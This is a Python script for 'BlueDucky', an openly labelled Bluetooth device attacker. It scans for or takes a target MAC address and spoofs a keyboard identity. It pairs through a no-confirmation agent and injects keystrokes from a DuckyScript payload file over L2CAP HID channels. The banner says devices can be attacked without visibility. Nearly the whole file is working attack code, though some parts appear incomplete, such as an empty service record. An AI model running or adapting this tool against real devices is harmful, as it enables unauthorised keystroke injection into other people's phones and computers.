import bluetooth import dbus import dbus.service import dbus.mainloop.glib import logging as log from multiprocessing import Process from threading import Thread import time import binascii from gi.repository import GLib from enum import Enum import subprocess from pydbus import SystemBus import sys import os import re import string child_processes = [] def print_blue_ascii_art(): blue_color_code = "\033[34m" # ANSI escape code for blue text reset_color_code = "\033[0m" # ANSI escape code to reset text color ascii_art = """ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⣄⣤⣤⣄⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⡶⠟⠛⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠷⢶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢷⣤⡀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣆⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣧⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣠⣤⣤⣤⣤⣤⣄⣀⡀⠀⠀⢹⣧⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣿⣷⣶⠶⠛⠛⠛⠛⠳⢶⣦⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣯⠉⠉⠉⠉⠉⠛⣷⠀⠀⢿⡄⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⢀⣠⣿⣀⡀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⠀⢀⣀⣀⣤⣴⠟⠀⠀⠸⣧⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⣙⣿⣿⣿⣿⣿⣿⠶⠶⠶⠿⠛⠛⠛⠛⠛⠛⢷⣦⡀⠉⠙⠛⠛⠛⠛⠛⠛⠛⠋⠉⠁⠀⠀⠀⠀⠀⣿⠀⠀⠀ ⠀⢀⣠⣴⠶⠾⠛⠛⠛⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡀⠀⠀ ⢠⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢗⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ ⠈⢿⣦⣄⣀⣀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣄⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ ⠀⠀⠈⠉⠛⠛⠛⢻⣟⠛⠛⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠻⠷⠀⢀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠛⠷⢶⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣴⠶⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⢹⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⡇⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡇⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣇⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣆⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⢶ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⡾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣴⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢀⣤⣤⡀⢀⣤⣤⡀⠀⣤⠀⠀⢀⣤⣄⢀⣤⣤⡀⠀⠀⣤⠀⠀⣠⠀⢀⣄⠀⠀⣠⣤⡀⠀⠀⠀⡀⠀⣠⡀⣠⣤⣤⣠⡀⠀⣤⢀⣤⣤⡀⣤⣤⡀ ⢸⣯⣹⡗⣿⣿⡏⠀⣼⣿⣇⢰⡿⠉⠃⣿⣿⡍⠀⠀⠀⢿⣤⣦⣿⠀⣾⢿⡆⢾⣯⣝⡃⠀⠀⢰⣿⣆⣿⡧⣿⣽⡍⠘⣷⣸⡏⣾⣿⡯⢸⣯⣩⡿ ⢸⡟⠉⠀⢿⣶⣶⢰⡿⠟⢻⡾⢷⣴⡆⢿⣶⣶⠄⠀⠀⠸⡿⠻⡿⣼⡿⠟⢿⢤⣭⣿⠟⠀⠀⢸⡇⠻⣿⠃⣿⣼⣶⠀⢻⡟⠀⢿⣧⣶⠸⣿⠻⣧ ⠀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⢀⡀⠀⠀⠀⠀⣀⠀⠀⠀⠀⣀⡀⠈⢀⣀⣀⠀⣁⣀⣀⢀⡀⠀⢀⣀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⠀⢠⣧⡀⣿⠀⠀⠀⣼⡿⢿⣄⣼⡟⢿⡿⠿⣿⠿⢻⣧⢠⡿⠿⣧⣀⣿⡄⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣧⣾⡟⣷⣿⠀⠀⠘⣿⣀⣸⡟⢹⡿⠟⠁⠀⣿⡀⢸⣏⢿⣇⣠⣿⢻⣏⢿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠁⠀⠙⠙⠁⠘⠋⠀⠀⠀⠈⠉⠉⠀⠘⠁⠀⠀⠀⠉⠁⠈⠁⠀⠉⠉⠁⠈⠋⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀""" print(blue_color_code + ascii_art + reset_color_code) def register_hid_profile(iface, addr): dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) bus = dbus.SystemBus() get_obj = lambda path, iface: dbus.Interface(bus.get_object("org.bluez", path), iface) addr_str = addr.replace(":", "_") path = "/org/bluez/%s/dev_%s" % (iface, addr_str) manager = get_obj("/org/bluez", "org.bluez.ProfileManager1") profile_path = "/test/profile" profile = Profile(bus, profile_path) hid_uuid = "00001124-0000-1000-8000-00805F9B34FB" # Hardcoded XML content xml_content = """ """ opts = {"ServiceRecord": xml_content} log.debug("calling RegisterProfile") manager.RegisterProfile(profile, hid_uuid, opts) loop = GLib.MainLoop() try: log.debug("running dbus loop") loop.run() except KeyboardInterrupt: log.debug("calling UnregisterProfile") manager.UnregisterProfile(profile) class Profile(dbus.service.Object): @dbus.service.method("org.bluez.Profile1", in_signature="", out_signature="") def Cancel(self): print("Profile.Cancel") class Key_Codes(Enum): NONE = 0x00 a = 0x04 b = 0x05 c = 0x06 d = 0x07 e = 0x08 f = 0x09 g = 0x0a h = 0x0b i = 0x0c j = 0x0d k = 0x0e l = 0x0f m = 0x10 n = 0x11 o = 0x12 p = 0x13 q = 0x14 r = 0x15 s = 0x16 t = 0x17 u = 0x18 v = 0x19 w = 0x1a x = 0x1b y = 0x1c z = 0x1d A = 0x04 B = 0x05 C = 0x06 D = 0x07 E = 0x08 F = 0x09 G = 0x0a H = 0x0b I = 0x0c J = 0x0d K = 0x0e L = 0x0f M = 0x10 N = 0x11 O = 0x12 P = 0x13 Q = 0x14 R = 0x15 S = 0x16 T = 0x17 U = 0x18 V = 0x19 W = 0x1a X = 0x1b Y = 0x1c Z = 0x1d _1 = 0x1e _2 = 0x1f _3 = 0x20 _4 = 0x21 _5 = 0x22 _6 = 0x23 _7 = 0x24 _8 = 0x25 _9 = 0x26 _0 = 0x27 ENTER = 0x28 ESCAPE = 0x29 BACKSPACE = 0x2a TAB = 0x2b SPACE = 0x2c MINUS = 0x2d EQUAL = 0x2e LEFTBRACE = 0x2f RIGHTBRACE = 0x30 BACKSLASH = 0x31 SEMICOLON = 0x33 QUOTE = 0x34 BACKTICK = 0x35 COMMA = 0x36 DOT = 0x37 SLASH = 0x38 CAPSLOCK = 0x39 F1 = 0x3a F2 = 0x3b F3 = 0x3c F4 = 0x3d F5 = 0x3e F6 = 0x3f F7 = 0x40 F8 = 0x41 F9 = 0x42 F10 = 0x43 F11 = 0x44 F12 = 0x45 PRINTSCREEN = 0x46 SCROLLLOCK = 0x47 PAUSE = 0x48 INSERT = 0x49 HOME = 0x4a PAGEUP = 0x4b DELETE = 0x4c END = 0x4d PAGEDOWN = 0x4e RIGHT = 0x4f LEFT = 0x50 DOWN = 0x51 UP = 0x52 NUMLOCK = 0x53 KEYPADSLASH = 0x54 KEYPADASTERISK = 0x55 KEYPADMINUS = 0x56 KEYPADPLUS = 0x57 KEYPADENTER = 0x58 KEYPAD1 = 0x59 KEYPAD2 = 0x5a KEYPAD3 = 0x5b KEYPAD4 = 0x5c KEYPAD5 = 0x5d KEYPAD6 = 0x5e KEYPAD7 = 0x5f KEYPAD8 = 0x60 KEYPAD9 = 0x61 KEYPAD0 = 0x62 KEYPADDELETE = 0x63 KEYPADCOMPOSE = 0x65 KEYPADPOWER = 0x66 KEYPADEQUAL = 0x67 F13 = 0x68 F14 = 0x69 F15 = 0x6a F16 = 0x6b F17 = 0x6c F18 = 0x6d F19 = 0x6e F20 = 0x6f F21 = 0x70 F22 = 0x71 F23 = 0x72 F24 = 0x73 OPEN = 0x74 HELP = 0x75 PROPS = 0x76 FRONT = 0x77 STOP = 0x78 AGAIN = 0x79 UNDO = 0x7a CUT = 0x7b COPY = 0x7c PASTE = 0x7d FIND = 0x7e MUTE = 0x7f VOLUMEUP = 0x80 VOLUMEDOWN = 0x81 LEFTCONTROL = 0xe0 LEFTSHIFT = 0xe1 LEFTALT = 0xe2 LEFTMETA = 0xe3 RIGHTCONTROL = 0xe4 RIGHTSHIFT = 0xe5 RIGHTALT = 0xe6 RIGHTMETA = 0xe7 MEDIAPLAYPAUSE = 0xe8 MEDIASTOPCD = 0xe9 MEDIAPREV = 0xea MEDIANEXT = 0xeb MEDIAEJECTCD = 0xec MEDIAVOLUMEUP = 0xed MEDIAVOLUMEDOWN = 0xee MEDIAMUTE = 0xef MEDIAWEBBROWSER = 0xf0 MEDIABACK = 0xf1 MEDIAFORWARD = 0xf2 MEDIASTOP = 0xf3 MEDIAFIND = 0xf4 MEDIASCROLLUP = 0xf5 MEDIASCROLLDOWN = 0xf6 MEDIAEDIT = 0xf7 MEDIASLEEP = 0xf8 MEDIACOFFEE = 0xf9 MEDIAREFRESH = 0xfa MEDIACALC = 0xfb class ConnectionFailureException(Exception): pass class Adapter: def __init__(self, iface): self.iface = iface self.bus = SystemBus() try: self.adapter = self.bus.get("org.bluez", "/org/bluez/%s" % iface) except KeyError: log.error("Unable to find adapter '%s', aborting." % iface) sys.exit(1) self.reset() def enable_ssp(self): run(["sudo", "btmgmt", "--index", self.iface, "io-cap", "1"]) run(["sudo", "btmgmt", "--index", self.iface, "ssp", "1"]) def disable_ssp(self): run(["sudo", "btmgmt", "--index", self.iface, "ssp", "0"]) def set_name(self, name): if self.adapter.Name != name: run(["sudo", "hciconfig", self.iface, "name", name]) if name not in run(["hciconfig", self.iface, "name"]).decode(): log.error("Unable to set adapter name, aborting.") sys.exit(1) def set_class(self, adapter_class): class_hex = "0x%06x" % adapter_class if self.adapter.Class != class_hex: run(["sudo", "hciconfig", self.iface, "class", class_hex]) if class_hex not in run(["hciconfig", self.iface, "class"]).decode(): log.error("Unable to set adapter class, aborting.") sys.exit(1) def set_address(self, address): run(["sudo", "bdaddr", "-i", self.iface, address]) self.reset() if address.upper() not in run(["hciconfig", self.iface]).decode(): log.error("Unable to set adapter address, aborting.") sys.exit(1) def down(self): self.adapter.Powered = False def up(self): self.adapter.Powered = True def reset(self): self.down() self.up() class Agent(dbus.service.Object): @dbus.service.method("org.bluez.Agent1", in_signature="", out_signature="") def Cancel(self): log.debug("Agent.Cancel") class PairingAgent: def __init__(self, iface, target_addr): self.iface = iface self.target_addr = target_addr dev_name = "dev_%s" % target_addr.upper().replace(":", "_") self.target_path = "/org/bluez/%s/%s" % (iface, dev_name) def __enter__(self): self.agent = Process(target=agent_loop, args=(self.target_path,)) self.agent.start() time.sleep(0.25) def __exit__(self, a, b, c): self.agent.kill() time.sleep(0.25) class L2CAPClient: def __init__(self, addr, port): self.addr = addr self.port = port self.connected = False self.sock = None def encode_keyboard_input(*args): keycodes = [] modifiers = 0 for a in args: if isinstance(a, Key_Codes): if a in [Key_Codes.LEFTSHIFT, Key_Codes.RIGHTSHIFT, Key_Codes.LEFTCONTROL, Key_Codes.RIGHTCONTROL, Key_Codes.LEFTALT, Key_Codes.RIGHTALT, Key_Codes.LEFTMETA, Key_Codes.RIGHTMETA]: # Set the bit for the modifier modifiers |= a.value else: keycodes.append(a.value) assert(len(keycodes) <= 6) keycodes += [0] * (6 - len(keycodes)) report = bytes([0xa1, 0x01, modifiers, 0x00] + keycodes) log.debug(f"{report}") return report def close(self): if self.connected: self.sock.close() self.connected = False self.sock = None def send(self, data): log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") timeout = 0.1 start = time.time() while (time.time() - start) < timeout: try: self.sock.send(data) log.debug(f"[TX-{self.port}] Data sent successfully") return except bluetooth.btcommon.BluetoothError as ex: log.error(f"[TX-{self.port}] BluetoothError: {ex}") if ex.errno != 11: # no data available raise ex time.sleep(0.001) except Exception as ex: log.error(f"[TX-{self.port}] Exception: {ex}") self.connected = False log.error(f"[TX-{self.port}] ERROR! Timed out sending data") def recv(self, timeout=0): start = time.time() while True: raw = None if not self.connected: return None if self.sock is None: return None try: raw = self.sock.recv(64) if len(raw) == 0: self.connected = False return None log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}") except bluetooth.btcommon.BluetoothError as ex: if ex.errno != 11: # no data available raise ex else: if (time.time() - start) < timeout: continue return raw def connect(self, timeout=None): log.debug(f"Attempting to connect to {self.addr} on port {self.port}") log.debug("connecting to %s on port %d" % (self.addr, self.port)) sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) sock.settimeout(timeout) try: sock.connect((self.addr, self.port)) sock.setblocking(0) self.sock = sock self.connected = True log.debug("SUCCESS! connected on port %d" % self.port) except Exception as ex: self.connected = False log.error("ERROR connecting on port %d: %s" % (self.port, ex)) raise ConnectionFailureException(f"Connection failure on port {self.port}") return self.connected def send_keyboard_report(self, *args): self.send(self.encode_keyboard_input(*args)) def send_keypress(self, *args, delay=0.05): self.send_keyboard_report(*args) time.sleep(0.05) self.send_keyboard_report() time.sleep(0.05) class L2CAPConnectionManager: def __init__(self, target_address): self.target_address = target_address self.clients = {} def create_connection(self, port): client = L2CAPClient(self.target_address, port) self.clients[port] = client return client def connect_all(self): success_count = 0 for port, client in self.clients.items(): if client.connect(): success_count += 1 else: log.debug(f"Failed to connect on port {port}") return success_count def close_all(self): for client in self.clients.values(): client.close() def run(command): assert(isinstance(command, list)) log.debug("executing '%s'" % " ".join(command)) return subprocess.check_output(command, stderr=subprocess.PIPE) def restart_bluetooth_daemon(): run(["sudo", "service", "bluetooth", "restart"]) time.sleep(0.5) def clear_screen(): os.system('clear') def agent_loop(target_path): dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) loop = GLib.MainLoop() bus = dbus.SystemBus() path = "/test/agent" agent = Agent(bus, path) agent.target_path = target_path obj = bus.get_object("org.bluez", "/org/bluez") manager = dbus.Interface(obj, "org.bluez.AgentManager1") manager.RegisterAgent(path, "NoInputNoOutput") manager.RequestDefaultAgent(path) log.debug("'NoInputNoOutput' pairing-agent is running") loop.run() # Function to load known devices from a file def load_known_devices(filename='known_devices.txt'): if os.path.exists(filename): with open(filename, 'r') as file: return [tuple(line.strip().split(',')) for line in file] else: return [] # Function to save discovered devices to a file def save_devices_to_file(devices, filename='known_devices.txt'): with open(filename, 'w') as file: for addr, name in devices: file.write(f"{addr},{name}\n") # Function to scan for devices def scan_for_devices(): main_menu() # Load known devices known_devices = load_known_devices() if known_devices: print("\nKnown devices:") for idx, (addr, name) in enumerate(known_devices): print(f"{idx + 1}: Device Name: {name}, Address: {addr}") use_known_device = input("\nDo you want to use one of these known devices? (yes/no): ") if use_known_device.lower() == 'yes': device_choice = int(input("Enter the number of the device: ")) return [known_devices[device_choice - 1]] # Normal Bluetooth scan print("\nAttempting to scan now...") nearby_devices = bluetooth.discover_devices(duration=8, lookup_names=True, flush_cache=True, lookup_class=True) device_list = [] if len(nearby_devices) == 0: print("\nNo nearby devices found.") else: print("\nFound {} nearby device(s):".format(len(nearby_devices))) for idx, (addr, name, _) in enumerate(nearby_devices): print(f"{idx + 1}: Device Name: {name}, Address: {addr}") device_list.append((addr, name)) # Save the scanned devices only if they are not already in known devices new_devices = [device for device in device_list if device not in known_devices] if new_devices: known_devices += new_devices save_devices_to_file(known_devices) return device_list def terminate_child_processes(): for proc in child_processes: if proc.is_alive(): proc.terminate() proc.join() def main_menu(): clear_screen() print_blue_ascii_art() title = "BlueDucky - Bluetooth Device Attacker" separator = 70 * "=" print(separator) print(f"{separator}\n{title.center(len(separator))}\n{separator}") print("Remember, you can still attack devices without visibility...\nIf you have their MAC address") print(separator) def is_valid_mac_address(mac_address): # Regular expression to match a MAC address in the form XX:XX:XX:XX:XX:XX mac_address_pattern = re.compile(r'^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$') return mac_address_pattern.match(mac_address) is not None # Function to read DuckyScript from file def read_duckyscript(filename='payload.txt'): if os.path.exists(filename): with open(filename, 'r') as file: return [line.strip() for line in file.readlines()] else: log.warning(f"File {filename} not found. Skipping DuckyScript.") return None # Main function def main(): log.basicConfig(level=log.DEBUG) main_menu() target_address = input("\nWhat is the target address? Leave blank and we will scan for you: ") if target_address == "": devices = scan_for_devices() if devices: if len(devices) > 1: # More than one device means a scan was performed selection = int(input("\nSelect a device by number: ")) - 1 if 0 <= selection < len(devices): target_address = devices[selection][0] else: print("\nInvalid selection. Exiting.") return else: # Only one device, means a known device was selected target_address = devices[0][0] else: return elif not is_valid_mac_address(target_address): print("\nInvalid MAC address format. Please enter a valid MAC address.") return # Check if payload exists duckyscript = read_duckyscript() if not duckyscript: duckyscript = "Hello There" log.info("Payload file not found. Exiting.") return main_menu() print(f"Attacking {target_address}\n") # Display Duckyscript after reading from file print(f"Duckyscript after reading from file: {duckyscript}") payload_line = duckyscript[0].replace('STRING ', '') restart_bluetooth_daemon() profile_proc = Process(target=register_hid_profile, args=('hci0', target_address)) profile_proc.start() child_processes.append(profile_proc) adapter = Adapter('hci0') adapter.set_name("Robot POC") adapter.set_class(0x002540) adapter.enable_ssp() try: # Manage connections connection_manager = L2CAPConnectionManager(target_address) sdp_client = connection_manager.create_connection(1) # SDP hid_control_client = connection_manager.create_connection(17) # HID Control hid_interrupt_client = connection_manager.create_connection(19) # HID Interrupt with PairingAgent('hci0', target_address) as agent: if connection_manager.connect_all(): client = connection_manager.clients[19] # HID Interrupt client client.send_keypress('') # Empty report time.sleep(0.5) if duckyscript == "Hello There": for letter in duckyscript: if letter == " ": client.send_keypress(Key_Codes.SPACE) else: client.send_keypress(Key_Codes[letter]) log.info("No DuckyScript commands to execute.") else: # Iterate through each line in duckyscript list from payload.txt for line in duckyscript: if line.startswith("REM"): continue # Ignore REM lines elif line.startswith("STRING"): text = line[7:] # Extract text after "STRING" for letter in text: # Send keypress for each letter if letter == " ": client.send_keypress(Key_Codes.SPACE) else: client.send_keypress(Key_Codes[letter]) else: raise ConnectionFailureException("Failed to connect to all required ports") except ConnectionFailureException as e: log.error(f"Connection failure: {e}") terminate_child_processes() log.debug("Device is most likely patched") sys.exit("Exiting script due to connection failure") if __name__ == "__main__": try: main() finally: terminate_child_processes()